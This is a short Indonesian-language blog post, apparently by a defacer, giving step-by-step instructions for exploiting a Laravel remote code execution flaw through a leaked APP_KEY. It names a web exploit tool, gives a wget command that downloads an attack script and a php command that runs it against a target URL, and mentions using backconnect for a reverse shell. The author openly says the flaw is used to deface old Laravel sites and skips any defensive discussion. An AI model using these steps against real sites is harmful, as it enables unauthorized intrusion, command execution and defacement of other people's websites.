Beberapa hari belakangan ini banyak beredar tentang exploit laravel RCE dimana pada bug ini memanfaatkan APP_Key yang bisa kita dapat dari .env ataupun dari kesalahan laravel debug. Kerentanan ini sering dimanfaatkan untuk melakukan deface / defacing terhadap situs situs laravel versi lawas.
Apakah semua laravel yang APP_KEY nya diketahui Bisa dilakukan rce? Tidak.
Ada beberapa syarat seperti versi Laravel dan penggunaan Laravel debug yang harus aktif. Saya sendiri tidak begitu paham dengan kondisi yang dibutuhkan jadi langsung aja skip ke exploitasi.
Exploitasi
Laravel RCE via Web Apps
1.Masuk ke https://exploit.anons79.com/
2.Masukkan target (perhatikan pernggunaan www,http,dan https)
3.Masukkan APP_KEY yang kalian dapat
4.Masukkan command (kalo saya seringkali dengan ls)
5.Klik exploit
Jika kalian ini melakukan backconnect kalian bisa menggunakan command disini
Laravel RCE via CLI
1.Download dulu toolsnya
wget https://raw.githubusercontent.com/wibuheker/exploit/master/php/laravel/rce.php -O lararce.php2.Kemudian eksekusi dengan command
php lararce.php url=http://target/ method=1Kalian bisa juga menggunakan appkey langsung jika mau, atau mengcustom command kalian dengan perintah pada gambar diatas.
Big Thanks : Xai Syndicate